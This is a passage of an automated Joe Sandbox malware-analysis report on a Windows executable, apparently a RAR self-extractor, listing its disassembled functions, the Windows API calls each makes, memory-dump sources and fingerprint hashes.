                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcsrchr
                                                                                              • String ID: .exe$.rar$.sfx
                                                                                              • API String ID: 3513545583-31770016
                                                                                              • Opcode ID: 64c95a0e6545d86d5038e58d9c1b35e6c030c3e5f2dc538d131159942aa9ad33
                                                                                              • Instruction ID: c78be7e957c980d7f60fa4192f756ac28eecd9f5481f8abb979c1ee42dc4ec73
                                                                                              • Opcode Fuzzy Hash: 64c95a0e6545d86d5038e58d9c1b35e6c030c3e5f2dc538d131159942aa9ad33
                                                                                              • Instruction Fuzzy Hash: 5A414A2260035395C732AF748892A7F73B8EF4375CF24490EFAA1AB182EB504F81D391
                                                                                              Function 00CBCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 00CBCE9D
                                                                                                • Part of subcall function 00CAB690: _wcslen.LIBCMT ref: 00CAB696
                                                                                              • _swprintf.LIBCMT ref: 00CBCED1
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                              • SetDlgItemTextW.USER32(?,00000066,00CE946A), ref: 00CBCEF1
                                                                                              • EndDialog.USER32(?,00000001), ref: 00CBCFFE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: %s%s%u
                                                                                              • API String ID: 110358324-1360425832
                                                                                              • Opcode ID: 8a8fc678ae78f2ea1fe0723953b5f337c34760b0c1407d097bc733c80dfc4c06
                                                                                              • Instruction ID: 4a25c9531e98adeed804987f3c157732df656213262a79b87ae721443baf1dbc
                                                                                              • Opcode Fuzzy Hash: 8a8fc678ae78f2ea1fe0723953b5f337c34760b0c1407d097bc733c80dfc4c06
                                                                                              • Instruction Fuzzy Hash: 45415FB1900259AADF259FA0DC85FEE77FCEB05340F4080A6F90AE7191EE709A44DF61
                                                                                              Function 00CABB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00CABB27
                                                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00CAA275,?,?,00000800,?,00CAA23A,?,00CA755C), ref: 00CABBC5
                                                                                              • _wcslen.LIBCMT ref: 00CABC3B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CurrentDirectory
                                                                                              • String ID: UNC$\\?\
                                                                                              • API String ID: 3341907918-253988292
                                                                                              • Opcode ID: 7ec7832b75334196feb0079892a18c084da0b25be027c833d2fa1eff0b257954
                                                                                              • Instruction ID: 6d6100f07a981ebdecf799dcbaee4b6168134376483872e3b58a1aff68e6fb58
                                                                                              • Opcode Fuzzy Hash: 7ec7832b75334196feb0079892a18c084da0b25be027c833d2fa1eff0b257954
                                                                                              • Instruction Fuzzy Hash: 0241B271400257A6CF21AFA0DC45EEF77ADAF423ACF108566F924A3152EB70DE90DB60
                                                                                              Function 00CC7F6E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\3AAyq819Vy.exe,00000104), ref: 00CC7FAE
                                                                                              • _free.LIBCMT ref: 00CC8079
                                                                                              • _free.LIBCMT ref: 00CC8083
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Users\user\Desktop\3AAyq819Vy.exe$`%y
                                                                                              • API String ID: 2506810119-4259162982
                                                                                              • Opcode ID: 4ad397ba5eddaba49315c695020a5fb5e4d87732f4b3870655ea60cdf9cc68d4
                                                                                              • Instruction ID: 7c719b0d90232c20a0a342ea9950f296ab623e23a7428ee04fa5c129e937f93a
                                                                                              • Opcode Fuzzy Hash: 4ad397ba5eddaba49315c695020a5fb5e4d87732f4b3870655ea60cdf9cc68d4
                                                                                              • Instruction Fuzzy Hash: CB318F71A00218AFDB21DF99D885FAFBBB8EB85310F10416EF51897211DB718E49DB61
                                                                                              Function 00CBB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadBitmapW.USER32(00000065), ref: 00CBB6ED
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00CBB712
                                                                                              • DeleteObject.GDI32(00000000), ref: 00CBB744
                                                                                              • DeleteObject.GDI32(00000000), ref: 00CBB767
                                                                                                • Part of subcall function 00CBA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6D5
                                                                                                • Part of subcall function 00CBA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6EC
                                                                                                • Part of subcall function 00CBA6C2: LoadResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA703
                                                                                                • Part of subcall function 00CBA6C2: LockResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA712
                                                                                                • Part of subcall function 00CBA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CBB73D,00000066), ref: 00CBA72D
                                                                                                • Part of subcall function 00CBA6C2: GlobalLock.KERNEL32(00000000), ref: 00CBA73E
                                                                                                • Part of subcall function 00CBA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CBA762
                                                                                                • Part of subcall function 00CBA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CBA7A7
                                                                                                • Part of subcall function 00CBA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00CBA7C6
                                                                                                • Part of subcall function 00CBA6C2: GlobalFree.KERNEL32(00000000), ref: 00CBA7CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                              • String ID: ]
                                                                                              • API String ID: 1797374341-3352871620
                                                                                              • Opcode ID: 2b494df56d3920df9ea3c3f1015dda3aea372981504f0ae59846948cfd8bfe17
                                                                                              • Instruction ID: 5b4e8d45838a0c7ec352cec0c72baf0b21128e0c484c18b9dee482ec54b93652
                                                                                              • Opcode Fuzzy Hash: 2b494df56d3920df9ea3c3f1015dda3aea372981504f0ae59846948cfd8bfe17
                                                                                              • Instruction Fuzzy Hash: 7401C03654060167C7227B799C49BEF7ABE9FC0B52F080011F954B7291EFB18E0992B1
                                                                                              Function 00CBD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00CBD64B
                                                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00CBD661
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CBD675
                                                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 00CBD684
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: RENAMEDLG
                                                                                              • API String ID: 445417207-3299779563
                                                                                              • Opcode ID: 475e166afa11cd7d0fc3d8a3bd0142fc13e3af8364cc5b21d7bae888416d9d91
                                                                                              • Instruction ID: 4aa975e44746168b96666356d736db2530eec7aeb260e432002e814da747f6b1
                                                                                              • Opcode Fuzzy Hash: 475e166afa11cd7d0fc3d8a3bd0142fc13e3af8364cc5b21d7bae888416d9d91
                                                                                              • Instruction Fuzzy Hash: F8012833345314BAD2204F659D09FAB776CEB5AB02F010815F30AE21D0D6A29A05CB7A
                                                                                              Function 00CC7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CC7E24,00000000,?,00CC7DC4,00000000,00CDC300,0000000C,00CC7F1B,00000000,00000002), ref: 00CC7E93
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CC7EA6
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00CC7E24,00000000,?,00CC7DC4,00000000,00CDC300,0000000C,00CC7F1B,00000000,00000002), ref: 00CC7EC9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 1abb006dd0b90c6dafa6c5b975f0c25d1f392bbf8cbd535e2e5c41e0e5876e49
                                                                                              • Instruction ID: 28c4c29bdd070b225f58ec9bb95bf3b17e533bf6c5a75b0a75da8c4e012b81f2
                                                                                              • Opcode Fuzzy Hash: 1abb006dd0b90c6dafa6c5b975f0c25d1f392bbf8cbd535e2e5c41e0e5876e49
                                                                                              • Instruction Fuzzy Hash: D5F06232A01218BFCB11AFA0DC09F9EBFB4EF44715F0181AEF805A2261DB309F40CA91
                                                                                              Function 00CAF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                                                                • Part of subcall function 00CB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CAF2E4
                                                                                              • GetProcAddress.KERNEL32(00CE81C8,CryptUnprotectMemory), ref: 00CAF2F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                              • API String ID: 2141747552-1753850145
                                                                                              • Opcode ID: 31615e601d845bf366671cd0f1c322884fa74fc3beb4601ca3c7ac3b0770d98b
                                                                                              • Instruction ID: 9c2f9bae2332ffe9c56ff24ddc06d72be09da4a63fa0e76a648bca5be565db00
                                                                                              • Opcode Fuzzy Hash: 31615e601d845bf366671cd0f1c322884fa74fc3beb4601ca3c7ac3b0770d98b
                                                                                              • Instruction Fuzzy Hash: 06E0DF74A017829ECB209BB4984CB027BD46F04704F14C82EE1DA93250C7B0E2408B21
                                                                                              Function 00CC2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2252061734-0
                                                                                              • Opcode ID: 2281d2893d5f160daf8c9029cef49c82a2271218c5f4d81fd314c52ee4c8c507
                                                                                              • Instruction ID: 77b8e03d1baa0dae9727ea2e62b0f9c5191eb5af56ca597b3f63b58f614f12e1
                                                                                              • Opcode Fuzzy Hash: 2281d2893d5f160daf8c9029cef49c82a2271218c5f4d81fd314c52ee4c8c507
                                                                                              • Instruction Fuzzy Hash: 1851C171600212AFEB298F14D845FBAB7B4FF64710F24452EEC16876A1D731EE81E790
                                                                                              Function 00CCBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00CCBF39
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CCBF5C
                                                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CCCA2C,00000000,?,00CC6CBE,?,00000008,?,00CC91E0,?,?,?), ref: 00CC8E38
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CCBF82
                                                                                              • _free.LIBCMT ref: 00CCBF95
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CCBFA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: f81ba7c967710e0ed18ee8beeb3009a3ed2a8c41340fdf2c1d660bbf5159db8b
                                                                                              • Instruction ID: 3a83af7ce3042abd76038bbabfae662f65e83949e84a153370c5a0c65a306d11
                                                                                              • Opcode Fuzzy Hash: f81ba7c967710e0ed18ee8beeb3009a3ed2a8c41340fdf2c1d660bbf5159db8b
                                                                                              • Instruction Fuzzy Hash: 3301D87AA022127F232116FA9C4EF7F6B6DDEC2B61714011EF904C2200EF608D0195B1
                                                                                              Function 00CC9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,00CC91AD,00CCB188,?,00CC9813,00000001,00000364,?,00CC3F73,00000050,?,00CE1030,00000200), ref: 00CC986E
                                                                                              • _free.LIBCMT ref: 00CC98A3
                                                                                              • _free.LIBCMT ref: 00CC98CA
                                                                                              • SetLastError.KERNEL32(00000000,?,00CE1030,00000200), ref: 00CC98D7
                                                                                              • SetLastError.KERNEL32(00000000,?,00CE1030,00000200), ref: 00CC98E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: f6cc1fa2b6778f19fa2df099bf66aa9654f3e66e590224dc3dfd053d9461df16
                                                                                              • Instruction ID: 2662498e36d09c1808ef2d8d77581b6db7878228efaf491d919b3d110a581d1d
                                                                                              • Opcode Fuzzy Hash: f6cc1fa2b6778f19fa2df099bf66aa9654f3e66e590224dc3dfd053d9461df16
                                                                                              • Instruction Fuzzy Hash: FB01D1361466026BC2126369EC8DF2F2669DBD2770B21013EF525971E2EE348E05A265
                                                                                              Function 00CB0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CB11CF: ResetEvent.KERNEL32(?), ref: 00CB11E1
                                                                                                • Part of subcall function 00CB11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00CB11F5
                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00CB0F21
                                                                                              • CloseHandle.KERNEL32(?,?), ref: 00CB0F3B
                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00CB0F54
                                                                                              • CloseHandle.KERNEL32(?), ref: 00CB0F60
                                                                                              • CloseHandle.KERNEL32(?), ref: 00CB0F6C
                                                                                                • Part of subcall function 00CB0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00CB1206,?), ref: 00CB0FEA
                                                                                                • Part of subcall function 00CB0FE4: GetLastError.KERNEL32(?), ref: 00CB0FF6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1868215902-0
                                                                                              • Opcode ID: 439d1e118f2d03a4682bcfa9bab000e854d7de5321f69b4550c9eec4df002983
                                                                                              • Instruction ID: 3e46236e75f5b444c271fd2d9f4df6e5fcf6bf122817922fe5f6cf1402ac45c4
                                                                                              • Opcode Fuzzy Hash: 439d1e118f2d03a4682bcfa9bab000e854d7de5321f69b4550c9eec4df002983
                                                                                              • Instruction Fuzzy Hash: 8D017172501784EFC7229B64DC84BCAFBA9FB08710F10092EF26B92160CB757A45DB54
                                                                                              Function 00CCC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00CCC817
                                                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                                                              • _free.LIBCMT ref: 00CCC829
                                                                                              • _free.LIBCMT ref: 00CCC83B
                                                                                              • _free.LIBCMT ref: 00CCC84D
                                                                                              • _free.LIBCMT ref: 00CCC85F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
